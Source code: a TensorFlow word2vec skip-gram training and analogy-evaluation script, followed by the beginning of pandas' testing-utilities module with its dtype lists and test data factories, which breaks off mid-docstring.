(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
# Custom skipgram / neg_train kernels, compiled alongside this script.
word2vec = tf.load_op_library(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'word2vec_ops.so'))

# Command-line flags configuring data paths, model size and training schedule.
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
    "train_data", None,
    "Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
    "eval_data", None, "Analogy questions. "
    "See README.md for how to get 'questions-words.txt'.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
    "epochs_to_train", 15,
    "Number of epochs to train. Each epoch processes the training data once "
    "completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
                     "Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
                     "Numbers of training examples each step processes "
                     "(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
                     "The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
                     "The number of words to predict to the left and right "
                     "of the target word.")
flags.DEFINE_integer("min_count", 5,
                     "The minimum number of word occurrences for it to be "
                     "included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
                   "Subsample threshold for word occurrence. Words that appear "
                   "with higher frequency will be randomly down-sampled. Set "
                   "to 0 to disable.")
flags.DEFINE_boolean(
    "interactive", False,
    "If true, enters an IPython interactive session to play with the trained "
    "model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
    "model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
    """Options used by our word2vec model."""

    def __init__(self):
        # Model options.

        # Embedding dimension.
        self.emb_dim = FLAGS.embedding_size

        # Training options.
        # The training text file.
        self.train_data = FLAGS.train_data
        # Number of negative samples per example.
        self.num_samples = FLAGS.num_neg_samples
        # The initial learning rate.
        self.learning_rate = FLAGS.learning_rate
        # Number of epochs to train. After these many epochs, the learning
        # rate decays linearly to zero and the training stops.
        self.epochs_to_train = FLAGS.epochs_to_train
        # Concurrent training steps.
        self.concurrent_steps = FLAGS.concurrent_steps
        # Number of examples for one training step.
        self.batch_size = FLAGS.batch_size
        # The number of words to predict to the left and right of the target word.
        self.window_size = FLAGS.window_size
        # The minimum number of word occurrences for it to be included in the
        # vocabulary.
        self.min_count = FLAGS.min_count
        # Subsampling threshold for word occurrence.
        self.subsample = FLAGS.subsample
        # Where to write out summaries. exist_ok avoids the old
        # check-then-create race between exists() and makedirs().
        self.save_path = FLAGS.save_path
        os.makedirs(self.save_path, exist_ok=True)

        # Eval options.
        # The text file for eval.
        self.eval_data = FLAGS.eval_data
class Word2Vec(object):
    """Word2Vec model (Skipgram)."""

    def __init__(self, options, session):
        self._options = options
        self._session = session
        # Bidirectional vocabulary maps, populated by build_graph().
        self._word2id = {}
        self._id2word = []
        self.build_graph()
        self.build_eval_graph()
        self.save_vocab()

    def read_analogies(self):
        """Reads through the analogy question file.

        Returns:
          questions: a [n, 4] numpy array containing the analogy question's
                     word ids.
          questions_skipped: questions skipped due to unknown words.
        """
        questions = []
        questions_skipped = 0
        with open(self._options.eval_data, "rb") as analogy_f:
            for line in analogy_f:
                if line.startswith(b":"):  # Skip comments.
                    continue
                words = line.strip().lower().split(b" ")
                ids = [self._word2id.get(w.strip()) for w in words]
                if None in ids or len(ids) != 4:
                    questions_skipped += 1
                else:
                    questions.append(np.array(ids))
        print("Eval analogy file: ", self._options.eval_data)
        print("Questions: ", len(questions))
        print("Skipped: ", questions_skipped)
        self._analogy_questions = np.array(questions, dtype=np.int32)

    def build_graph(self):
        """Build the model graph."""
        opts = self._options
        # The training data. A text file.
        (words, counts, words_per_epoch, current_epoch, total_words_processed,
         examples, labels) = word2vec.skipgram_word2vec(filename=opts.train_data,
                                                        batch_size=opts.batch_size,
                                                        window_size=opts.window_size,
                                                        min_count=opts.min_count,
                                                        subsample=opts.subsample)
        # Materialize the vocabulary once; the ops above computed it.
        (opts.vocab_words, opts.vocab_counts,
         opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
        opts.vocab_size = len(opts.vocab_words)
        print("Data file: ", opts.train_data)
        print("Vocab size: ", opts.vocab_size - 1, " + UNK")
        print("Words per epoch: ", opts.words_per_epoch)
        self._id2word = opts.vocab_words
        for i, w in enumerate(self._id2word):
            self._word2id[w] = i
        # Declare all variables we need.
        # Input words embedding: [vocab_size, emb_dim]
        w_in = tf.Variable(
            tf.random_uniform(
                [opts.vocab_size,
                 opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
            name="w_in")
        # Output weights: [vocab_size, emb_dim] (the old comment here
        # mislabeled this as the global step).
        w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
        # Global step: []
        global_step = tf.Variable(0, name="global_step")
        # Linear learning rate decay.
        words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
        lr = opts.learning_rate * tf.maximum(
            0.0001,
            1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
        # Training nodes.
        inc = global_step.assign_add(1)
        with tf.control_dependencies([inc]):
            train = word2vec.neg_train_word2vec(w_in,
                                                w_out,
                                                examples,
                                                labels,
                                                lr,
                                                vocab_count=opts.vocab_counts.tolist(),
                                                num_negative_samples=opts.num_samples)
        self._w_in = w_in
        self._examples = examples
        self._labels = labels
        self._lr = lr
        self._train = train
        self.global_step = global_step
        self._epoch = current_epoch
        self._words = total_words_processed

    def save_vocab(self):
        """Save the vocabulary to a file so the model can be reloaded."""
        opts = self._options
        with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
            for i in xrange(opts.vocab_size):
                vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
                f.write("%s %d\n" % (vocab_word,
                                     opts.vocab_counts[i]))

    def build_eval_graph(self):
        """Build the evaluation graph."""
        # Eval graph
        opts = self._options
        # Each analogy task is to predict the 4th word (d) given three
        # words: a, b, c. E.g., a=italy, b=rome, c=france, we should
        # predict d=paris.
        # The eval feeds three vectors of word ids for a, b, c, each of
        # which is of size N, where N is the number of analogies we want to
        # evaluate in one batch.
        analogy_a = tf.placeholder(dtype=tf.int32)  # [N]
        analogy_b = tf.placeholder(dtype=tf.int32)  # [N]
        analogy_c = tf.placeholder(dtype=tf.int32)  # [N]
        # Normalized word embeddings of shape [vocab_size, emb_dim].
        nemb = tf.nn.l2_normalize(self._w_in, 1)
        # Each row of a_emb, b_emb, c_emb is a word's embedding vector.
        # They all have the shape [N, emb_dim]
        a_emb = tf.gather(nemb, analogy_a)  # a's embs
        b_emb = tf.gather(nemb, analogy_b)  # b's embs
        c_emb = tf.gather(nemb, analogy_c)  # c's embs
        # We expect that d's embedding vectors on the unit hyper-sphere is
        # near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
        target = c_emb + (b_emb - a_emb)
        # Compute cosine distance between each pair of target and vocab.
        # dist has shape [N, vocab_size].
        dist = tf.matmul(target, nemb, transpose_b=True)
        # For each question (row in dist), find the top 4 words.
        _, pred_idx = tf.nn.top_k(dist, 4)
        # Nodes for computing neighbors for a given word according to
        # their cosine distance.
        nearby_word = tf.placeholder(dtype=tf.int32)  # word id
        nearby_emb = tf.gather(nemb, nearby_word)
        nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
        nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
                                             min(1000, opts.vocab_size))
        # Nodes in the construct graph which are used by training and
        # evaluation to run/feed/fetch.
        self._analogy_a = analogy_a
        self._analogy_b = analogy_b
        self._analogy_c = analogy_c
        self._analogy_pred_idx = pred_idx
        self._nearby_word = nearby_word
        self._nearby_val = nearby_val
        self._nearby_idx = nearby_idx
        # Properly initialize all variables.
        tf.global_variables_initializer().run()
        self.saver = tf.train.Saver()

    def _train_thread_body(self):
        # Keep issuing training steps until the input pipeline rolls over
        # into the next epoch.
        initial_epoch, = self._session.run([self._epoch])
        while True:
            _, epoch = self._session.run([self._train, self._epoch])
            if epoch != initial_epoch:
                break

    def train(self):
        """Train the model."""
        opts = self._options
        initial_epoch, initial_words = self._session.run([self._epoch, self._words])
        workers = []
        for _ in xrange(opts.concurrent_steps):
            t = threading.Thread(target=self._train_thread_body)
            t.start()
            workers.append(t)
        last_words, last_time = initial_words, time.time()
        while True:
            time.sleep(5)  # Reports our progress once a while.
            (epoch, step, words, lr) = self._session.run(
                [self._epoch, self.global_step, self._words, self._lr])
            now = time.time()
            last_words, last_time, rate = words, now, (words - last_words) / (
                now - last_time)
            print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
                                                                          lr, rate),
                  end="")
            sys.stdout.flush()
            if epoch != initial_epoch:
                break
        for t in workers:
            t.join()

    def _predict(self, analogy):
        """Predict the top 4 answers for analogy questions."""
        idx, = self._session.run([self._analogy_pred_idx], {
            self._analogy_a: analogy[:, 0],
            self._analogy_b: analogy[:, 1],
            self._analogy_c: analogy[:, 2]
        })
        return idx

    def eval(self):
        """Evaluate analogy questions and reports accuracy."""
        # How many questions we get right at precision@1.
        correct = 0
        try:
            total = self._analogy_questions.shape[0]
        except AttributeError as e:
            raise AttributeError("Need to read analogy questions.")
        start = 0
        # Evaluate in batches of 2500 questions.
        while start < total:
            limit = start + 2500
            sub = self._analogy_questions[start:limit, :]
            idx = self._predict(sub)
            start = limit
            for question in xrange(sub.shape[0]):
                for j in xrange(4):
                    if idx[question, j] == sub[question, 3]:
                        # Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
                        correct += 1
                        break
                    elif idx[question, j] in sub[question, :3]:
                        # We need to skip words already in the question.
                        continue
                    else:
                        # The correct label is not the precision@1
                        break
        print()
        print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
                                                  correct * 100.0 / total))

    def analogy(self, w0, w1, w2):
        """Predict word w3 as in w0:w1 vs w2:w3."""
        wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
        idx = self._predict(wid)
        for c in [self._id2word[i] for i in idx[0, :]]:
            if c not in [w0, w1, w2]:
                print(c)
                break
        # NOTE(review): this prints "unknown" even when a candidate was
        # found above (break does not skip it) — looks unintended; confirm.
        print("unknown")

    def nearby(self, words, num=20):
        """Prints out nearby words given a list of words."""
        ids = np.array([self._word2id.get(x, 0) for x in words])
        vals, idx = self._session.run(
            [self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
        for i in xrange(len(words)):
            print("\n%s\n=====================================" % (words[i]))
            for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
                print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
    """Open an interactive IPython session (useful for debugging/development)."""
    import IPython
    shell_ns = {}
    if local_ns:
        shell_ns.update(local_ns)
    # Module globals take precedence over caller locals, as before.
    shell_ns.update(globals())
    IPython.start_ipython(argv=[], user_ns=shell_ns)
def main(_):
    """Train a word2vec model."""
    if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
        print("--train_data --eval_data and --save_path must be specified.")
        sys.exit(1)
    opts = Options()
    with tf.Graph().as_default(), tf.Session() as session:
        with tf.device("/cpu:0"):
            # The custom ops run on CPU; build the whole model there.
            model = Word2Vec(opts, session)
            model.read_analogies()  # Read analogy questions
        for _ in xrange(opts.epochs_to_train):
            model.train()  # Process one epoch
            model.eval()  # Eval analogies.
        # Perform a final save.
        model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
                         global_step=model.global_step)
        if FLAGS.interactive:
            # E.g.,
            # [0]: model.analogy(b'france', b'paris', b'russia')
            # [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
            _start_shell(locals())
if __name__ == "__main__":
    # tf.app.run parses the flags, then invokes main(argv).
    tf.app.run()
|
__init__.py | from __future__ import annotations
import collections
from datetime import datetime
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
List,
Type,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_datetime64_dtype,
is_datetime64tz_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.arrays import DatetimeArray, PeriodArray, TimedeltaArray, period_array
if TYPE_CHECKING:
from pandas import PeriodIndex, TimedeltaIndex
# Default dimensions for generated test objects: _N rows, _K columns.
_N = 30
_K = 4

# Dtype groupings used by test parametrizations across the suite.
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: List[Dtype] = [bool, "bool"]
BYTES_DTYPES: List[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: List[Dtype] = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
    ALL_REAL_DTYPES
    + COMPLEX_DTYPES
    + STRING_DTYPES
    + DATETIME64_DTYPES
    + TIMEDELTA64_DTYPES
    + BOOL_DTYPES
    + OBJECT_DTYPES
    + BYTES_DTYPES
)

# Values treated as missing by pandas.
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA]
EMPTY_STRING_PATTERN = re.compile("^$")

# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
    """Enable always-show warning filters when PANDAS_TESTING_MODE requests it."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" not in mode:
        return
    for category in _testing_mode_warnings:
        warnings.simplefilter("always", category)
def reset_testing_mode():
    """Silence the warning filters that set_testing_mode() turned on."""
    mode = os.environ.get("PANDAS_TESTING_MODE", "None")
    if "deprecate" not in mode:
        return
    for category in _testing_mode_warnings:
        warnings.simplefilter("ignore", category)
# Apply PANDAS_TESTING_MODE warning filters once at import time.
set_testing_mode()
def reset_display_options():
    """
    Restore every ``display.*`` option to its default value.
    """
    pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
    """
    True when arr1 and arr2 contain exactly the same set of unique elements.
    """
    return len(frozenset(arr1) ^ frozenset(arr2)) == 0
def box_expected(expected, box_cls, transpose=True):
    """
    Wrap the expected output of a test in ``box_cls`` for comparison.

    Parameters
    ----------
    expected : np.ndarray, Index, Series
    box_cls : {Index, Series, DataFrame}
    transpose : bool, default True
        For DataFrame, return a single-row (not single-column) frame.

    Returns
    -------
    subclass of box_cls
    """
    if box_cls is pd.array:
        return pd.array(expected)
    if box_cls is pd.Index:
        return pd.Index(expected)
    if box_cls is pd.Series:
        return pd.Series(expected)
    if box_cls is pd.DataFrame:
        frame = pd.Series(expected).to_frame()
        if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
            # not a single-column, in order to operate against non-DataFrame
            # vectors of the same length.
            frame = frame.T
        return frame
    if box_cls is PeriodArray:
        # the PeriodArray constructor is not as flexible as period_array
        return period_array(expected)
    if box_cls is DatetimeArray:
        return DatetimeArray(expected)
    if box_cls is TimedeltaArray:
        return TimedeltaArray(expected)
    if box_cls is np.ndarray:
        return np.array(expected)
    if box_cls is to_array:
        return to_array(expected)
    raise NotImplementedError(box_cls)
def to_array(obj):
    """
    Coerce ``obj`` to the matching ExtensionArray, else a plain ndarray.
    (temporary implementation until we get pd.array in place)
    """
    dtype = getattr(obj, "dtype", None)
    if is_period_dtype(dtype):
        return period_array(obj)
    if is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
        return DatetimeArray._from_sequence(obj)
    if is_timedelta64_dtype(dtype):
        return TimedeltaArray._from_sequence(obj)
    return np.array(obj)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
    """First ``k`` uppercase ASCII letters, used as default column labels."""
    letters = string.ascii_uppercase
    return letters[:k]
# make index
def makeStringIndex(k=10, name=None):
    """Index of ``k`` random 10-character ASCII strings."""
    values = rands_array(nchars=10, size=k)
    return Index(values, name=name)
def makeUnicodeIndex(k=10, name=None):
    """Index of ``k`` random 10-character unicode strings."""
    values = randu_array(nchars=10, size=k)
    return Index(values, name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
    """make a length k index or n categories"""
    categories = rands_array(nchars=4, size=n)
    codes = np.arange(k) % n
    cat = Categorical.from_codes(codes, categories=categories)
    return CategoricalIndex(cat, name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
    """make a length k IntervalIndex with evenly spaced breaks on [0, 100]"""
    breaks = np.linspace(0, 100, num=k + 1)
    return IntervalIndex.from_breaks(breaks, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
    """Index of ``k`` booleans: False, True, then False padding."""
    if k == 1:
        values = [True]
    elif k == 2:
        values = [False, True]
    else:
        values = [False, True] + [False] * (k - 2)
    return Index(values, name=name)
def makeIntIndex(k=10, name=None):
    """Index of the integers 0..k-1 (a materialized list, not a RangeIndex)."""
    values = list(range(k))
    return Index(values, name=name)
def makeUIntIndex(k=10, name=None):
    """Index of ``k`` unsigned ints starting at 2**63 (beyond int64 range)."""
    base = 2 ** 63
    return Index([base + offset for offset in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
    """RangeIndex covering 0..k-1 with step 1."""
    return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
    """Index of ``k`` random floats, scaled by a random power of ten."""
    base = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
    scale = 10 ** np.random.randint(0, 9)
    return Index(base * scale, name=name)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
    """DatetimeIndex of ``k`` periods at frequency ``freq`` from 2000-01-03."""
    start = datetime(2000, 1, 1)
    dates = bdate_range(start, periods=k, freq=freq, name=name)
    return DatetimeIndex(dates, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
    """TimedeltaIndex of ``k`` periods starting at one day."""
    start = "1 day"
    return pd.timedelta_range(start=start, periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
    """PeriodIndex of ``k`` business-day periods starting 2000-01-01."""
    start = datetime(2000, 1, 1)
    return pd.period_range(start=start, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
    """Fixed 4-element MultiIndex (foo/bar x 1/2); note ``k`` is ignored."""
    levels = (("foo", "bar"), (1, 2))
    return MultiIndex.from_product(levels, names=names, **kwargs)
# Pool of first names used by _make_timeseries's "name" column.
_names = [
    "Alice",
    "Bob",
    "Charlie",
    "Dan",
    "Edith",
    "Frank",
    "George",
    "Hannah",
    "Ingrid",
    "Jerry",
    "Kevin",
    "Laura",
    "Michael",
    "Norbert",
    "Oliver",
    "Patricia",
    "Quinn",
    "Ray",
    "Sarah",
    "Tim",
    "Ursula",
    "Victor",
    "Wendy",
    "Xavier",
    "Yvonne",
    "Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
    """
    Make a DataFrame with a DatetimeIndex

    Parameters
    ----------
    start : str or Timestamp, default "2000-01-01"
        The start of the index. Passed to date_range with `freq`.
    end : str or Timestamp, default "2000-12-31"
        The end of the index. Passed to date_range with `freq`.
    freq : str or Freq
        The frequency to use for the DatetimeIndex
    seed : int, optional
        The random state seed.

    Returns
    -------
    DataFrame
        Indexed by "timestamp", with columns:
        * name : object dtype with string names
        * id : int dtype with
        * x, y : float dtype

    Examples
    --------
    >>> _make_timeseries()
                  id    name         x         y
    timestamp
    2000-01-01   982   Frank  0.031261  0.986727
    2000-01-02  1025   Edith -0.086358 -0.032920
    2000-01-03   982   Edith  0.473177  0.298654
    2000-01-04  1009   Sarah  0.534344 -0.750377
    2000-01-05   963   Zelda -0.271573  0.054424
    ...          ...     ...       ...       ...
    2000-12-27   980  Ingrid -0.132333 -0.422195
    2000-12-28   972   Frank -0.376007 -0.298687
    2000-12-29  1009  Ursula -0.865047 -0.503133
    2000-12-30  1000  Hannah -0.063757 -0.507336
    2000-12-31   972     Tim -0.869120  0.531685
    """
    index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
    n = len(index)
    state = np.random.RandomState(seed)
    columns = {
        "name": state.choice(_names, size=n),
        "id": state.poisson(1000, size=n),
        "x": state.rand(n) * 2 - 1,
        "y": state.rand(n) * 2 - 1,
    }
    df = pd.DataFrame(columns, index=index, columns=sorted(columns))
    # date_range is end-inclusive; drop the final row so the result covers
    # the half-open interval [start, end)
    if df.index[-1] == end:
        df = df.iloc[:-1]
    return df
def index_subclass_makers_generator():
    """Yield the maker functions for each Index subclass, one at a time."""
    yield makeDateIndex
    yield makePeriodIndex
    yield makeTimedeltaIndex
    yield makeRangeIndex
    yield makeIntervalIndex
    yield makeCategoricalIndex
    yield makeMultiIndex
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
    """
    Generator which can be iterated over to get instances of all the classes
    which represent time-series.
    Parameters
    ----------
    k: length of each of the index instances
    """
    for maker in (makeDateIndex, makePeriodIndex, makeTimedeltaIndex):
        yield maker(k=k)
# make series
def makeFloatSeries(name=None):
    """Return a length-_N Series of random floats with a random-string index."""
    index = makeStringIndex(_N)
    return Series(np.random.randn(_N), index=index, name=name)
def makeStringSeries(name=None):
    """Return a length-_N Series of random floats with a random-string index.

    NOTE: implementation is identical to makeFloatSeries; kept for API symmetry.
    """
    index = makeStringIndex(_N)
    return Series(np.random.randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
    """Return a length-_N object-dtype Series of random strings."""
    data = makeStringIndex(_N)
    # force object dtype so the values stay plain Python strings
    data = Index(data, dtype=object)
    index = makeStringIndex(_N)
    return Series(data, index=index, name=name)
def getSeriesData():
    """Return a dict of _K random float Series sharing one random-string index."""
    index = makeStringIndex(_N)
    return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
    """Return a random float Series indexed by nper business days."""
    if nper is None:
        nper = _N
    return Series(
        np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
    )
def makePeriodSeries(nper=None, name=None):
    """Return a random float Series indexed by nper business-day periods."""
    if nper is None:
        nper = _N
    return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
    """Return a dict of _K random time series keyed by column name."""
    return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
    """Return a dict of _K random period-indexed series keyed by column name."""
    return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
    """Return a DataFrame of _K random float columns on a DatetimeIndex."""
    data = getTimeSeriesData(nper, freq)
    return DataFrame(data)
def makeDataFrame() -> DataFrame:
    """Return an _N x _K DataFrame of random floats with a string index."""
    data = getSeriesData()
    return DataFrame(data)
def getMixedTypeDict():
    """Return (index, data) for a small frame with mixed column dtypes."""
    index = Index(["a", "b", "c", "d", "e"])
    data = {
        "A": [0.0, 1.0, 2.0, 3.0, 4.0],
        "B": [0.0, 1.0, 0.0, 1.0, 0.0],
        "C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
        "D": bdate_range("1/1/2009", periods=5),
    }
    return index, data
def makeMixedDataFrame():
    """Return a small mixed-dtype DataFrame (the index part is discarded)."""
    return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
    """Return a DataFrame of _K random float columns on a PeriodIndex."""
    data = getPeriodData(nper)
    return DataFrame(data)
def makeCustomIndex(
    nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
    """
    Create an index/multindex with given dimensions, levels, names, etc'

    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multindex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. if True will use default
        names, if false will use no names, if a list is given, the name of
        each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
        label will repeated at the corresponding level, you can specify just
        the first few, the rest will use the default ndupe_l of 1.
        len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `idx_nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index
        "dt" create a datetime index.
        "td" create a timedelta index.
        if unspecified, string labels will be generated.
    """
    if ndupe_l is None:
        ndupe_l = [1] * nlevels
    assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    # BUGFIX: compare the name count with ==, not `is` -- identity comparison
    # on ints only happens to work for CPython's small-int cache.
    assert names is None or names is False or names is True or len(names) == nlevels
    assert idx_type is None or (
        idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
    )
    if names is True:
        # build default names
        names = [prefix + str(i) for i in range(nlevels)]
    if names is False:
        # pass None to index constructor for no name
        names = None
    # make singleton case uniform
    if isinstance(names, str) and nlevels == 1:
        names = [names]
    # specific 1D index type requested?
    idx_func = {
        "i": makeIntIndex,
        "f": makeFloatIndex,
        "s": makeStringIndex,
        "u": makeUnicodeIndex,
        "dt": makeDateIndex,
        "td": makeTimedeltaIndex,
        "p": makePeriodIndex,
    }.get(idx_type)
    if idx_func:
        idx = idx_func(nentries)
        # but we need to fill in the name
        if names:
            idx.name = names[0]
        return idx
    elif idx_type is not None:
        raise ValueError(
            f"{repr(idx_type)} is not a legal value for `idx_type`, "
            "use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
        )
    if len(ndupe_l) < nlevels:
        # pad unspecified levels with the default multiplicity of 1
        ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
    assert len(ndupe_l) == nlevels
    assert all(x > 0 for x in ndupe_l)

    def keyfunc(x):
        # sort labels "<prefix>_l<level>_g<group>" by their embedded integers
        # rather than lexicographically ("g10" must come after "g9")
        import re

        numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
        return [int(num) for num in numeric_tuple]

    # build a list of lists to create the index from
    # (keyfunc is hoisted out of the loop; it does not depend on the level)
    list_of_lists = []
    for i in range(nlevels):
        div_factor = nentries // ndupe_l[i] + 1
        cnt: Counter[str] = collections.Counter()
        for j in range(div_factor):
            label = f"{prefix}_l{i}_g{j}"
            cnt[label] = ndupe_l[i]
        # cute Counter trick: elements() repeats each label ndupe_l[i] times
        result = sorted(cnt.elements(), key=keyfunc)[:nentries]
        list_of_lists.append(result)
    tuples = list(zip(*list_of_lists))
    # convert tuples to index
    if nentries == 1:
        # we have a single level of tuples, i.e. a regular Index
        # NOTE(review): assumes names is not None here; nentries == 1 with the
        # default names=False raises TypeError -- preexisting behavior.
        index = Index(tuples[0], name=names[0])
    elif nlevels == 1:
        name = None if names is None else names[0]
        index = Index((x[0] for x in tuples), name=name)
    else:
        index = MultiIndex.from_tuples(tuples, names=names)
    return index
def makeCustomDataframe(
    nrows,
    ncols,
    c_idx_names=True,
    r_idx_names=True,
    c_idx_nlevels=1,
    r_idx_nlevels=1,
    data_gen_f=None,
    c_ndupe_l=None,
    r_ndupe_l=None,
    dtype=None,
    c_idx_type=None,
    r_idx_type=None,
):
    """
